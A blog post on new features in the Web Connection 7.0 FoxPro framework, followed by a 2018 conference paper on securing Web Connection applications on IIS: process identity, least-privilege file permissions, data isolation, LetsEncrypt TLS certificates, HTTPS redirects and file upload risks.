This is very useful especially if you just want to play around with a project as it allows you to make changes to the newly created project and then simply rollback to the original commit to get right back to the original start state.

It's also quite useful for samples that update existing applications. For example, I recently created the User Security Manager, and comparing the initial commit with the post-integration state in Git makes it very easy to see exactly what changes the update integration Wizard makes to get the new project running.

As a side note, Web Connection projects are very Git friendly, since they typically don't include VCX files. With the v7.0 move away from the VCX based wwBusiness, the last vestige of visual classes has been removed. If you use visual classes you'll need additional tooling like FoxBin2Prg to convert them to text that Git can use for comparison and merging.

Code Snippets for Visual Studio and Visual Studio Code

Another big push in this release has been to improve integration into Development IDE's. Web Connection 7 now ships with a number of Intellisense code snippets for Visual Studio and Visual Studio Code. In both development environments you now have a host of code snippets that start with wc- to help inject common Web Connection Html Helpers as well as common HTML and Bootstrap constructs and full page templates (ie. wc-template-content-page).

In Visual Studio:

And in Visual Studio Code:

The Visual Studio Add-in also has a number of enhancements that allow hooking up an alternate code editor to view your process class code (I use Visual Studio Code for that these days).

Fixing a Script Page Path Dependency

Another highlight for me is that Web Connection script pages that use Layout pages no longer hard code the script page path into the compiled page. This fixes a long standing issue that caused problems when you moved script files - and specifically compiled FXP files - between different locations.

In v7.0 the hard coded path is no longer present, which means you can now compile your script pages on your dev machine and ship them to the server without worrying about path discrepancies.

The old code used to do this sort of thing:

The result of this was that you'd get content page PRG files that had something like this:

LOCAL CRLF
CRLF = CHR(13) + CHR(10)

 pcPageTitle = "Customers - Time Trakker" 

 IF (!wwScriptIsLayout)
    wwScriptIsLayout = .T.
    wwScriptContentPage = "c:\webconnectionprojects\timetrakker\web\Customers.ttk"
    ...
ENDIF

The hard coded path is now replaced by a variable that is passed down from the beginning of the script processing pipeline, which is ugly from a code perspective (a non-traceable reference, basically) but clearly preferable to a hardcoded path generated at script compilation time.

It's a small fix, but one that caused a number of mysterious failures that were difficult to track down, because the error claimed the script was not found even though the path presumably was correct.

So yes, this is a small but very satisfying fix...

Markdown Improvements

There are also a number of improvements related to Markdown processing in Web Connection. You probably know that Web Connection ships with a MarkdownParser class that has a Markdown() method you can use to parse Markdown into HTML. The MarkdownParser class provides additional control over which features load and what processing options are applied, but in essence all of that provides basic Markdown parsing.

Web Connection 7.0 adds default HTML sanitation of the generated HTML content. Markdown is a superset of HTML, so it's possible to embed script code into Markdown, and SanitizeHtml() is now hooked into the Markdown processor by default to strip out script tags, JavaScript events and javascript: urls.

SanitizeHtml() is now also available as a generic HTML sanitation method in wwUtils - you can use it on any user captured HTML input to strip script code.
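
As a quick sketch, usage might look like this (assuming the Web Connection libraries are loaded; the sample strings are my own):

*** Render Markdown to HTML - sanitized by default in 7.0
lcHtml = Markdown("### Hello *World*")

*** Strip script code from any user captured HTML
lcSafe = SanitizeHtml([Hi! <script>alert("gotcha");</script>])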

Web Connection 7.0 also includes a couple of new Markdown Features:

  • Markdown Islands in Scripts and Templates
  • Markdown Pages that can just be dropped into a site

Markdown Islands

Markdown Islands are blocks of Markdown contained inside of a <markdown></markdown> block, which are rendered as Markdown.

You can now do things like this:

<markdown>
   Welcome back <%= poModel.Username %>

   ### Your Orders
   <% 
      SELECT TOrders 
      SCAN
   %>
      **<%= TOrders.OrderNo %>** - <%= FormatValue(TOrders.OrderDate,"MMM dd, yyyy") %>
   <% ENDSCAN %>
</markdown>

You can now embed script expressions and code blocks inside of Markdown blocks and they will execute.

Note that there are some caveats: Markdown blocks are expanded prior to full script parsing, and any Markdown that is generated is embedded as static text into the page. The script processor then parses the rendered Markdown just like any other HTML markup on the page.

Markdown Pages

Markdown Pages is a new feature that lets you drop any .md file into a Web site and render that page as HTML content in your site, using a default, customizable template.

This is a great feature for quickly creating static HTML content like documentation, a simple blog, or documents like About or Terms of Service pages. Rather than creating HTML pages, you can simply create a Markdown document, drop it into the site, and have it rendered as HTML.

For example, you can simply drop a Markdown file of a blog post document into a folder like this:

http://west-wind.com/wconnect/Markdown/posts/2018/09/25/FixWwdotnetBridgeBlocking.md

which results in a Web page like this:

All that needs to happen to make that work is dropping a markdown file into a folder along with its dependent resources:

You can customize how the Markdown is rendered via a Markdown_Template.wcs script page. By default this page simply renders using nothing more than the layout page as a frame with the content rendered inside of it. But the template is customizable.

Here's what the default template looks like:

<%
    pcPageTitle = IIF(type("pcTitle") = "C", pcTitle, pcFilename)
%>
<% Layout="~/views/_layoutpage.wcs" %>

<div class="container">
    <%= pcMarkdown %>
</div>

<link rel="stylesheet" href="~/lib/highlightjs/styles/vs2015.css">
<script src="~/lib/highlightjs/highlight.pack.js"></script>
<script>
    function highlightCode() {
        var pres = document.querySelectorAll("pre>code");
        for (var i = 0; i < pres.length; i++) {
            hljs.highlightBlock(pres[i]);
        }
    }
    highlightCode();
</script>

Three values are passed to this template:

  • pcTitle - the page title (parsed out from the document via YAML header or first # header)
  • pcFileName - the filename of the underlying .md file
  • pcMarkdown - the rendered HTML from the Markdown text of the file

Authentication and Security Enhancements

Security has been an ongoing area of improvement in Web Connection. Security is hard no matter what framework you use, and Web Connection is no exception. Recent versions have gained many helper methods that make it much easier to plug in just the components of the authentication system that you want to hook into or replace.

In this release the focus has been on making sure that all the authentication objects are in a consistent state when you access them. If you access cAuthenticatedUser, lIsAuthenticated, cAuthenticatedUsername, oUserSecurity, oUser and so on, Web Connection now makes sure that the current user has been validated. Previously it was left up to the developer to ensure that either Authenticate() or OnCheckForAuthentication() was called to actually validate the user and set up the various objects and properties.

In v7.0, accessing any of these properties performs an automatic authentication check that ensures these objects and values are properly set, without any explicit intervention by your own code.

Another new feature is auto-encryption of passwords when cPasswordEncryptionKey is set. You can now add non-encrypted passwords to the database, and the next time the record is saved it will automatically encrypt the passwords. This allows an admin user to add passwords without having to pre-hash them, and it also allows legacy user security tables to automatically upgrade themselves to encrypted passwords as they run.
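
A minimal sketch of enabling this - assuming the framework's wwUserSecurity class; your setup code may differ:

*** Once a key is set, saves auto-encrypt any plain-text passwords
loSecurity = CREATEOBJECT("wwUserSecurity")
loSecurity.cPasswordEncryptionKey = "MySuperSecretKey"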

New User Security Manager Addin Product

In parallel with the release of Web Connection 7.0, I'm also releasing a separate product, the User Security Manager for Web Connection, which provides a complete user authentication and basic user management process as an add-in Web Connection process class. The add-in process class takes over all authentication operations besides the core authentication check, which is shared with your application's process class(es).

The Security Manager is a drop-in process class, which means all the logic and code related to it is completely separate from your application's process class(es). All authentication operations like sign in, sign out, account validation, password recovery, profile creation and editing, and user management are handled completely independently.

In addition, the library provides the base templates for enhanced login, profile editing, password recovery, account validation and the user manager. These templates are standard Web Connection script pages, and they are meant to be extended if necessary with your own custom fields that relate to your user accounts.

You can find out more on the User Security Manager Web site:

User Security Manager for Web Connection

What about breaking changes?

As I mentioned, whenever these large upgrades come due we spend a bit of time finding the balance between new features, refactoring out unused features, and breaking backwards compatibility.

Given the many enhancements and features in this v7.0 release the breaking changes are minimal, and for the most part require only simple fixes.

The core areas are:

  • Bootstrap and FontAwesome Updates in the Templates
  • VCX to PRG Class Migrations
  • Deprecated classes

Out of those the HTML Bootstrap update is easily the most severe - the others are mostly simple search and replace operations with perhaps a few minor adjustments.

There's a detailed topic in the help file that provides more information on the breaking changes:

Breaking Changes: Web Connection 7.0 from 6.x

More and more

There's still more. To see a complete list of all the changes that have been made, check out the change log:

Web Connection Change Log

Summary

As you can see there's a lot of new stuff, and a lot of exciting new functionality in Web Connection 7.0. I'm especially excited about the project related features and easier launching of applications, as well as BrowserSync, which I've been using for the last month and which has been a big productivity boost.

So, check out Web Connection 7.0 and find your favorite new features.

this post created and published with Markdown Monster

Web Connection Security


Prepared for: Southwest Fox
October 2018

Security should be on every Web developer's mind when building a new Web application or enhancing an existing one. Not a day goes by that we don't hear about another security breach on some big Web site with scads of customer data compromised.

Security is hard

Managing Web site security is never easy as there are a lot of different attack vectors and if you are new to Web development it's very easy to miss even simple security precautions.

The good news is that the majority of security issues can be thwarted by a handful of good practices, which I'll cover in this paper. But keep in mind that this is not everything that can go wrong. I'm no security expert either, but I've been around Web applications long enough to have seen most of the common attack vectors and know how to deal with them. That's not to say that I have all the answers, and this paper isn't meant to be an end-all security document. If you are serious about security you should look at specific courses that deal explicitly with Web security, or even go as far as hiring a security specialist who can assess the state of your Web site's security.

Security is also an ongoing topic, something that needs to be kept up with. Attack vectors change over time, as do the tools you use to build and run your Web sites.

The main takeaway from this short introduction is that security is serious business, and you should think about it right from the moment you start building your application, while you are adding new features, and when it is up and running - even when it is 'done'. Be vigilant.

Web Connection and Security

West Wind Web Connection is a generic Web framework that provides an interface for FoxPro to interact with a Web Server - primarily IIS - on Windows. Web Connection provides a rudimentary set of security features, but it is not, and never was, intended as a complete security solution.

Part of this is because the majority of security related issues have little to do with the actual application itself and deal more with network management and IT administration.

The focus of this paper is on the things that are important to a Web Connection application and that you as a developer using Web Connection and building a Web application have to think about.

Here's what I'm going to cover:

  • Web Security
    • Web Server Security - IIS
    • TLS Encryption
    • Authentication
  • Physical Access & Network
    • Who can get at the box?
    • Who can hack into the system
    • File system Permissions
    • Web Application Identity
  • Operating System
    • Who can access files on the machine
  • Middleware Technology
    • Who can hi-jack the application
    • Spoofing

Web Server and Site Security

The first step is making sure that your Web Server and your Web site are secure. Most of the issues around this are related to the setup and configuration of IIS and of the specific Web site you are creating.

IIS Security

The first line of defense involves the Web Server, which in most cases for a Web Connection application will be Microsoft's built-in IIS server. IIS 7 and later is secure by default, which means that when you install the Web Server it installs with very minimal features. The base install can serve static files and nothing more.

In order to configure IIS for Web applications - and Web Connection applications specifically - you need to add a number of additional components that enable ASP.NET and/or ISAPI, Authentication, and some of the administration features.

Figure 1 - Core features required for a Web Connection IIS installation

The key things are:

  • ASP.NET or ISAPI
    These are the connector interfaces that connect Web Connection to IIS. You only need one or the other to run, but both are supported in Web Connection and can be switched with simple configuration settings. The .NET module is the preferred mechanism, sporting the most up to date code base and much more sophisticated administration features.

  • Authentication
    In order to access the Web Connection administrative features and to perform the default admin folder blocking, Web Connection uses default Windows authentication. If you use .NET you only need to install Windows Authentication, but Basic Authentication can also be used. Both of these auth mechanisms are tied to Windows user accounts. Web Connection also provides application level security features that are separate from either of these mechanisms (more on that later).

  • IIS Management
    In order for the Web Connection tools to configure IIS, you need the IIS Management tools enabled, so make sure the IIS Management Console is installed, as well as the IIS 6 Metabase Compatibility feature, which is a COM/ADS based IIS administration interface that's used by most tools.

How IIS and Web Connection Interact

A key perspective for understanding IIS Web security from an application execution standpoint is to understand how IIS and your Web Connection application use Windows Identity while the application is executing.

It's all about Identity

The Windows Identity determines the rights that your application has on the Windows machine it is running on. A Web application's requests transfer through a number of Windows processes, and each one has a specific Identity assigned to it.

Identity is crucial to system security because it determines what your Web application can access on the local machine and potentially on the network. The higher the access rights, the higher the risk that if your application is compromised some damage can be inflicted on the entire machine. The key phrase is if your application is compromised.

There's an inverse relationship between how secure your application is and how much effort you have to put in to use more limited accounts. Using a high permissions account like SYSTEM or an Admin account lets your application freely access the entire machine, but if there ever is a problem it also lets a hacker access your entire machine freely. If you choose to run under a more limited security scheme you have to explicitly expose each location on disk and possibly on the network that the application has access to.

Realize that clamping down security may not help you prevent access to data that your application uses anyway in case of an attack. Your application needs to have access, so in case of a security compromise that means a potential hacker also has access. Still, it's a good idea to minimize rights as much as possible by using a lower rights account and explicitly setting access where it's needed.

Web Connection Uses SYSTEM by Default: Change it for Production

When a new Web Connection application is created, Web Connection by default sets the Identity to SYSTEM which is a full access account on Windows. WWWC does this because SYSTEM is the only generic account in Windows that has the rights to just work out of the box when running in COM mode. Any other account requires some configuration. The setup routines are meant to configure a development machine initially and are not meant for production. For production choose a specific account, or NETWORK SERVICE and provide explicit system rights required by your application.
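If you want to script the production change, the IIS appcmd utility can switch an Application Pool's identity. A minimal sketch - "MyAppPool" is a placeholder for your own Application Pool name:

%windir%\system32\inetsrv\appcmd set apppool "MyAppPool" /processModel.identityType:NetworkService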

IIS and FoxPro

Let's drill in a little closer to understand where Identity applies. For IIS and Web Connection there are two different processes that you are concerned with and each can, but doesn't have to, have its own process Identity:

  • The IIS Application Pool
  • Your FoxPro Exe Server

For Web Connection both are separate EXEs and each can have their own identity.

Use Launching User Passthrough Identity for FoxPro Server

I recommend you never explicitly set the identity of your FoxPro EXE (in DcomCnfg), but rather use the default, pass-through security of the Launching User that applies when no custom DCOM Identity is configured. By doing so you only need to worry about the Identity of the Application Pool and not that of your FoxPro EXE.

The Process and Identity Hierarchy

Figure 2 shows the different processes that are involved when running an IIS Web Server:

Figure 2 - IIS and Web Connection in the Context of Windows

IIS is a Windows Web Server so everything is hosted within the context of the Windows OS. All the boxes you see in Figure 2 are processes.

IIS Administration Service

The IIS Admin service is a top level and somewhat disconnected system service that is responsible for launching Web Sites/Application Pools and monitoring them. When IIS starts, or when you recycle IIS as a whole or an individual Application Pool, you are interacting with the IIS Admin service. It's responsible for making sure that Web sites get started and keep running, and it monitors individual application pools for the various process limits you can configure in the Application Pool configuration. This service sits in the background of Windows and is internal to it - you generally don't configure or interact with it directly except when you use the Management Console or IISRESET.

Application Pool

Application Pools are the base process, an EXE that one or more Web sites are hosted in. You can configure many application pools in IIS and you can add 1 or more Web sites to an application pool. Generally it's best to give mission critical applications their own application pool, while it's perfectly fine for many light use or static Web sites to be sharing a single Application Pool.

An application pool executes as an EXE: w3wp.exe. When you are running IIS and you have active clients you can see one or more w3wp.exe processes running.

Figure 3 - Application Pools (w3wp.exe) and Web Connection EXE are separate processes with their own identity

I think of an Application Pool as the Web application and I like to set the Identity of the Application Pool in the Application Pool settings as the only place where Identity is set. Instead, I use the default passthrough security for any processes that are launched from the application pool.

Figure 4 - You can set Application Pool Identity in the Advanced Settings for the Pool

FoxPro Web Connection Server

Your FoxPro Web Connection Server runs as a separate out of process COM EXE server or as a file based standalone FoxPro application.

File based servers are started either as the Interactive User if you explicitly start the server from Explorer, or using the Application Pool's Identity.

COM servers use either the Application Pool's Identity - which I highly recommend - or the Identity you explicitly assign in DcomCnfg. I really want to dissuade you from setting Identity in DcomCnfg simply because it can get very confusing what's running under which account. The only time that makes sense is if you really want your IIS process and your FoxPro COM server to use different accounts.

The ideal scenario is to use the default DCOM Identity configuration, which is the Launching User, in DcomCnfg:

Figure 5 - DcomCnfg lets you set the identity of your FoxPro server. Don't do it unless you have a good reason

Note that Figure 5 shows the default so you never have to explicitly set the Launching User. Only set this setting if you are changing the Identity to something else.

Make sure to use the 32 bit version of DcomCnfg:
MMC comexp.msc /32

When do you need DcomCnfg?

One big frustration with Web Connection is that it runs an EXE server that might need configuration. If you are using the default setup for Web Connection, which uses the SYSTEM account, no DCOM Configuration is required.

No DCOM Configuration is required for:

  • SYSTEM
  • Administrator accounts
  • Interactive

For all other accounts you have to configure the DCOM Launch and Activation and Access settings to allow specific users to launch either your COM server specifically, or COM servers generically on the machine.

Figure 6 - Setting Launch and Access and Activate for a DCOM Server

These permissions can either be set on the specific server as shown here, or at the Local Machine level in which case they are applied to launching all EXE servers. In this example, I'm explicitly adding NETWORK SERVICE to the permissions. Both Launch and Access (shown) and Activation have to be set.

Network Service as a Production Account

For production machines I often use Network Service because it's a low rights account that has to be explicitly given access everywhere, but it's generic, doesn't require a password and doesn't require configuration of a special user account, which makes your configuration more portable.

Beware of the ApplicationPoolIdentity

IIS by default creates new Application Pools using ApplicationPoolIdentity which is a dynamic account that has no rights on the local machine at all. You can't even set permissions for it in the Windows ACL dialogs. This account is meant for static sites that don't touch the local machine in any way, and it is not appropriate for Web Connection. You will not be able to launch a COM Server or even a file based server from the Web server with it.

Identity and your Application

Once your security is configured your application runs under a specific account and that account is what has access to the disk and other system services. If your app runs under NETWORK SERVICE, you won't be able to write to HKEY_LOCAL_MACHINE in the registry, for example, or write a file into the c:\Windows\System32 directory.

The goal is to allow access only in application specific locations so that if your application is compromised in any way, at worst the attacker can damage your own application but can't take over the entire machine. If you run as SYSTEM, it is possible for the attacker to plant malware or other executing code that monitors your machine and sends data off to somewhere else.

It all boils down to this:

Choose an account to run your application that has the rights that your application needs to run and nothing more

File System Security

Related to the process identity is File System security. The file system is probably the most vulnerable aspect when it comes to hack attempts. Hackers love to exploit holes in applications that allow any sort of file uploads that might allow them to plant an executable in the file system, and then somehow execute that file to compromise security or access your data.

The best avenue to thwart that sort of scenario is to minimize file permissions as much as possible.

Choose a limited Application Account

A lot of this was discussed in the Application Pool security section where I discussed using a low rights account and then giving it just the rights needed to run the application. Once you have a low rights account, start with minimal permissions and very selectively give WRITE permissions. The list below summarizes typical permissions; a scripted example follows.

Web Folders
  • Read/Execute Permissions in the Web Folder
  • Read/Write for web.config or wc.ini in Web Folder
    to persist Admin page configuration settings (optional)
Application Folder
  • Read/Execute in the Application/EXE folder
  • Read/Write access in Data Folders
  • Better: Don't use local data, but a SQL Backend for Data Access
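Here's what those permissions can look like scripted with icacls. A minimal sketch, assuming NETWORK SERVICE as the application account and hypothetical folder locations:

:: Read/Execute on the Web folder (inherited by files and subfolders)
icacls "c:\WebApps\MyApp\Web" /grant "NETWORK SERVICE:(OI)(CI)(RX)"

:: Read/Write on web.config to persist Admin page settings (optional)
icacls "c:\WebApps\MyApp\Web\web.config" /grant "NETWORK SERVICE:(M)"

:: Read/Execute on the application/EXE folder
icacls "c:\WebApps\MyApp\Deploy" /grant "NETWORK SERVICE:(OI)(CI)(RX)"

:: Read/Write on the data folder
icacls "c:\WebApps\MyApp\Data" /grant "NETWORK SERVICE:(OI)(CI)(M)"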

Isolate your Data

In addition to system file access you also have to worry about data breaches. If you're using local or network FoxPro data you need to worry about those data locations.

Don't allow direct access from the Internet

This seems pretty obvious but any data you access from your application should only be accessible internally with no access from the Internet. Don't put data into a Web accessible path inside of your Web site. Always put data files into a completely separate non-Web accessible folder hierarchy.

Web Connection by default uses this structure:

Project Root
--- Data                 Optional Data Folder
--- Deploy               Application Binaries
--- Web                  Mapped Web Folder

This is just a suggestion, but whatever you do, never put data files (or anything else that is sensitive) into the Web folder. It's acceptable to put data into the Deploy folder as a subfolder. Do put your data files into a self-contained folder so it's easy to move the data.

And while you're at it: for God's sake don't hardcode paths in your application. Try to always use relative paths, and if possible use variables for path names that can be read from a configuration file. If there's ever a problem, being able to move the data quickly is key, and hardcoded paths make that very difficult. Configured paths from a configuration file can be changed without making code changes.
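For example, rather than hardcoding a data location you can read it from an INI file at startup. A minimal sketch using the Windows GetPrivateProfileString API - the MyApp.ini file name, the DataPath key and the customers table are hypothetical:

*** Read a configured data path instead of hardcoding it
DECLARE INTEGER GetPrivateProfileString IN WIN32API ;
   STRING cSection, STRING cEntry, STRING cDefault, ;
   STRING @cBuffer, INTEGER nSize, STRING cIniFile

lcBuffer = SPACE(256)
lnSize = GetPrivateProfileString("Main", "DataPath", "", ;
                                 @lcBuffer, 256, FULLPATH("MyApp.ini"))
lcDataPath = LEFT(lcBuffer, lnSize)

IF EMPTY(lcDataPath)
   *** Fall back to a path relative to the application folder
   lcDataPath = ADDBS(SYS(5) + CURDIR()) + "data\"
ENDIF

USE (lcDataPath + "customers")   && hypothetical table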

Ideally for security data should not be stored locally on the server, but rather sit on another machine that is not otherwise Internet accessible. The other machine should be on the internal network only or be accessible only via VPN. Make it so only your application account has access.

Use a SQL Backend on a Separate Server

An even better solution is to remove physical data entirely from the equation and instead store your data inside of a SQL backend of some sort, with the only access to the data via a username/password in a connection string that is stored encrypted.

As with data files, you want to make sure that the SQL backend is not exposed directly to the Internet. SQL Server by default doesn't allow remote access, but you can lock it down to specify which IP addresses or subnets have access. Likewise databases like MongoDb let you cut off internet access completely. Either way make sure that you use complex username and password sequences that are hard to break and store passwords in a safe place - encrypted if possible.

Protecting your Data

The next thing you'll want to do is ensure that your server is not leaking data and that the data you do send to others is secure and can't be spied upon.

Certificates: Protected Traffic on the Wire

The data you send over the wire may be sensitive or confidential. Or it's as simple as the fact that you log into a Web site and you send a username and password and that data has to be secure.

Web Server Certificates are meant to address this issue by encrypting all content that is transmitted over the Web connection. Both data you send and the data that comes back is encrypted using strong public key cryptography which makes it nearly impossible to spy on traffic as it travels over the wire.

Intercepting HTTP traffic is easier than you might think. Using little more than a network analyzer it's possible to siphon packets off the network and piece together requests if they are not encrypted. Worse there are hardware devices out there that can pose as a WiFi access point that capture network packets and then pass them on to another router as if nothing was wrong. Encryption of content over HTTPS prevents most of the attack vectors for this type of attack.

TLS (Transport Layer Security) addresses these issues by encrypting your content in such a way that your browser and the server are the only ones that can decrypt the content that travels over the wire making it very difficult for anybody listening in on the conversation 'en route' to get useful data out of the network packets.

TLS is for Security only not for Validation

One important thing to understand about TLS encryption and certificates is that the purpose of certificates is to encrypt content on the wire.

There are a couple of different 'grades' of certificates:

  • Standard Certificates (Domain Validated)
  • Extended Validation (EV) Certificates

Contrary to what the big SSL Service companies like Verisign, Comodo, Digicert etc. want you to believe, certificates are not meant to serve the purpose of validation for a specific site. But 'Extended Validation' certificates purport to do this by requiring the registrant to go through an extra validation process that is not required for standard Certificates. Standard Certificates are validated simply by checking that the DNS for the domain is valid and matches the signature of the certificate request.

EV Certificates are a lot more expensive, especially now that Standard certificates are effectively free from LetsEncrypt (more on that in a minute). There's no difference between a standard certificate from LetsEncrypt or Verisign or Comodo - they all use the same level of encryption and the same level of DNS validation, for example. EV certs do offer the green company name in the address bar, but if you check among the most popular sites on the Web you'll find that very few even very big companies bother to use these EV certificates. It's really just wasted money.

Wildcard Domains

If you need to secure an entire domain and all of its sub sites - ie. support.west-wind.com, markdownmonster.west-wind.com, store.west-wind.com, west-wind.com - you can use a Wildcard Certificate. Wildcard certificates let you bind a single certificate to any sub-domain and they are nice if you have a ton of subdomains, and absolutely essential if you run a multi-tenant Web site that uses subdomains.

For example, Markus Egger and I run kavadocs.com which lets users create subdomains for their own documentation sites: websurge.kavadocs.com, westwind-utilities.west-wind.com and so on are all bound to the single wildcard domain and managed through a single wildcard DNS entry that maps back to an Azure Web site. The application can then read the SERVER_NAME Server Variable to determine the target domain and handle requests for that particular tenant.

LetsEncrypt has been offering free certificates for a few years now and I've been running on those for the last 2 years. LetsEncrypt also started offering free wildcard domain certificates earlier this year, which makes it even easier to handle multi-domain Web sites.

HTTPS is no longer an Option

If you plan on running a commercial Web site of any sort, plan on using HTTPS for the site. Even if you think there's nothing sensitive about your site of cat pictures, there are good reasons to always use HTTPS for your requests.

  • It's easy: No changes required on your Web site
  • It's more secure (Doh!)
  • It's free
  • Non secure sites are ranked lower on Search Engines

No Web Site Changes required

Switching a site to run from plain HTTP to HTTPS doesn't require any changes. HTTPS is simply a protocol change which means the only difference is that the URL changes from http://mysite.com to https://mysite.com. Assuming your code and links are not explicitly hardcoding URLs - which they definitely should not - you shouldn't need to make any changes. You can easily switch between HTTP and HTTPS and behavior should otherwise be the same.
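For example, using site relative links instead of hardcoded absolute URLs keeps pages working under either protocol (the URLs below are hypothetical):

<!-- Don't: hardcoded protocol and host -->
<a href="http://mysite.com/orders">Orders</a>

<!-- Do: a site relative link works over both http:// and https:// -->
<a href="/orders">Orders</a>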

TLS Certificates are now Free and Easy thanks to LetsEncrypt

A few years ago, Mozilla and a consortium of industry players got together and created a free certificate authority called LetsEncrypt. LetsEncrypt provides domain specific TLS certificates for free using an open organization rather than a commercial entity to provide this service. What this means is that the service is totally free, no strings attached, and it's designed to stay that way as it is not a commercial venture but rather a not-for-profit consortium of organizations that promote security on the Web.

LetsEncrypt makes Certificates Easy To Manage

In the past both the price and the certificate request and installation process were a pain, but LetsEncrypt helps with that as well. Not only are LetsEncrypt Certificates free, they are also very easy to install, revoke and renew. LetsEncrypt provides a set of public APIs that are used to make certificate requests, and this ACME protocol framework provides a standard set of tools to manage the entire certificate creation, validation, revocation and renewal process.

There are tools for almost any platform that make it easy to integrate with LetsEncrypt. On Windows there's an open source tool called Win-Acme (formerly called LetsEncrypt-Win-Simple) which makes it drop dead simple to create a certificate and install it into IIS. It's so easy you can do it literally in less than 5 minutes.

Let's walk through it:

  • Download the latest Win-Acme release from:
    https://github.com/PKISharp/win-acme/releases

  • Unzip the Zip file into a folder of your choice

  • Open an Administrative Powershell or Command Prompt

  • cd into the install folder

  • run .\letsencrypt

In the following example I'm creating a new certificate for one of my existing sites, samples.west-wind.com. Before you do this make sure your DNS is set up and your site is reachable from the Internet using its full domain name.

Once you do this here's what running LetsEncrypt looks like:

Figure 7 - Executing Win-Acme LetsEncrypt from the Commandline

In this run I create a single site certificate so I just Create New Certificate, then choose Single Binding, then pick my site from the list (10 in this case). And that's it.

LetsEncrypt then goes out and uses the ACME protocol to make a new certificate request, which involves creating the request and putting some API related data into a .well-known folder that LetsEncrypt checks to verify the domain exists and matches the machine that the certificate request originates from. LetsEncrypt calls back, verifies the information and, if that checks out, issues a new certificate that is passed back to the client. The client then takes the completed certificate, imports it into IIS and creates the appropriate certificate mapping on your selected Web site.

Et voila! In all of 3-5 minutes and no manual interaction at all, you now have a new certificate on the site:

Figure 8 - A valid LetsEncrypt TLS Certificate on the site

and in IIS:

Figure 9 - LetsEncrypt automatically binds the certificate in IIS

LetsEncrypt also installs a scheduled task that once a day checks for certificates that are within a few days of expiring and automatically renews them. LetsEncrypt is smart enough to not renew or replace certificates that are already installed unless you use a --forcerenewal command line switch.

With certificates being free and ridiculously easy to install there's no reason not to install SSL certificates

Search Engines optimize Secure Sites

Google and Bing a couple of years ago started factoring security into search rankings. Non-secure sites are ranked below secure sites with similar content.

This alone ought to be enough reason for any commercial site to use HTTPS for all requests.

Forcing a Site to use SSL

When you type a URL into a browser, by default the URL is an http url. Recently browsers have started to check for https first, then try http if that fails, but that doesn't seem to be 100% reliable. You'll want to make sure that your site always returns HTTPS content.

The easiest way to do that is by using a Url Rewrite Rule. IIS has an optional tool called UrlRewrite that can be installed that allows you to apply a set of rules to rewrite any URL that comes into your site. Unfortunately UrlRewrite is not a native IIS component, so you have to install it first. Easiest is to install it with Chocolatey:

choco install UrlRewrite

Alternately you can install it with the Microsoft Web Platform Installer from this download link:

Once installed, UrlRewrite Rules can either be created in the IIS Admin UI, or you can directly add rules into the Web site's web.config file.

<configuration>
  <system.webServer>
    <rewrite>
      <rules>
        <rule name="Redirect to HTTPS" stopProcessing="true">
          <match url="(.*)" />
          <conditions>
            <add input="{HTTPS}" pattern="^OFF$" />
          </conditions>
          <action type="Redirect" url="https://{HTTP_HOST}/{R:1}" redirectType="SeeOther" />
        </rule>
      </rules>
    </rewrite>
  </system.webServer>
</configuration>

This rule matches every URL and checks the HTTPS server variable for a value of OFF (ie. the request is not running over https://). If it is off, the URL is rewritten with the https:// protocol prepended to the host and the captured site relative path.

Once this rule is active any request to http:// is automatically re-routed to https://.

Note that you may also want to install a local, self-signed certificate in IIS for your local development so that your live and local dev environment both use HTTPS.
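On recent versions of Windows you can create that local development certificate with a single PowerShell command (run as Administrator) and then bind it to your site in the IIS Manager. A sketch, assuming localhost as the DNS name:

New-SelfSignedCertificate -DnsName "localhost" -CertStoreLocation Cert:\LocalMachine\My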

Just Do It

If you've been holding off using HTTPS, the time is now! Using LetsEncrypt makes the process of creating a new certificate and getting it into IIS ridiculously easy and best of all it's free.

5 minutes and no money down - what could be easier? You have everything to gain and nothing to lose.

File System Security

We already discussed Identity and how it affects file access, but let's turn this around and look at it from the application perspective. Each Web application is made up of one or more folder hierarchies which the application needs to access.

The gold standard for file system security is: use the rights that you absolutely need, and nothing more

In file system terms this usually means you need to make sure your Web application can access:

  • Your Application Folder (read/execute)
  • Your Data Folder if using FoxPro data (read/write)
  • Your Web Folder (read/execute)

Use a non-Admin Account

If you want to be secure everything starts by using a non Admin/non SYSTEM account that by default has no rights anywhere on the machine. Essentially, with an account like that you are white listing the exact folders that are allowed access and keeping everything else off limits. If you build a single self contained application this should be easy to do. It gets more complicated if you have an application that needs to interact with other components or applications that also live on the same system. You should try to minimize these, but even if that's the case you would still selectively enable rights as needed.

Minimize User Accounts

Remove or disable any user accounts on a server that are not used. Any user account is a potential attack vector. Windows itself won't create extra accounts, but if you're running on a shared server removing accounts may not be an option. Even on shared machines make sure you know what each account is for and minimize what's there.

For Web Servers I recommend you don't expose domain accounts unless you need them to log into admin functions of the application. Using local accounts and duplicating them is a much safer choice that avoids potentially compromising domain credentials. There should be very little need to use Windows Security on a Web server with the exception of the West Wind Web Connection Administration features. If you really want to you can even switch that to ASP.NET Forms Authentication with auth info stored inside of web.config.

NTFS File/Directory Permissions

IIS recognizes Windows ACL permissions on files and directories and again the Identity of your application is crucial here. There are two accounts that need to have rights to access a Web Site:

  • The Application Pool Identity has to have Read/Execute rights
  • The IUSR_ Account is required for Anonymous users to access the Web site

If there are specific folders you want to lock down for anonymous users you can remove or explicitly block the IUSR_ account. Web Connection does this by default for the /Admin folder, which requires logging in to be accessed because IUSR_ has been removed.
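Scripted with icacls, removing anonymous access from the Admin folder can look like this - a sketch with a hypothetical site path; note that the anonymous account is named IUSR on IIS 7 and later (IUSR_<machinename> on older versions):

icacls "c:\WebApps\MyApp\Web\admin" /remove "IUSR"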

Beware of File Uploads

One of the scariest things you can do in a Web application is accept file uploads. File uploads essentially allow a third party to bring content to your server, and you have to be extremely careful with what you do with uploaded files.

The Threat of Remote Execution

The biggest concern is that somehow an executable file of some sort is uploaded, stored in a Web Folder and then executed remotely. Think for a minute that somehow a black hat is allowed to upload an ASPX page or a Web Connection script. If that is possible in any way, shape or form, the attacker basically has carte blanche to execute code on your server under the Identity your application is running, which is likely to be at least somewhat elevated. At the very least the attacker will have access to your data; at worst, if running as SYSTEM or Admin, he can hack into your system and install additional malware that does much worse, like Ransomware, or malware that monitors whatever travels over the network.

Limit what can be Uploaded

The first defense with file uploads is to limit what can be uploaded. There should be no reason to ever allow binary or script files to be uploaded. Uploads should always filter both on the client and the server for the specific file types expected.

If you are expecting images, restrict to images, if you need a PDF allow only PDFs. If you need multiple files ask for a Zip file and always, always check extensions both on the client and server.

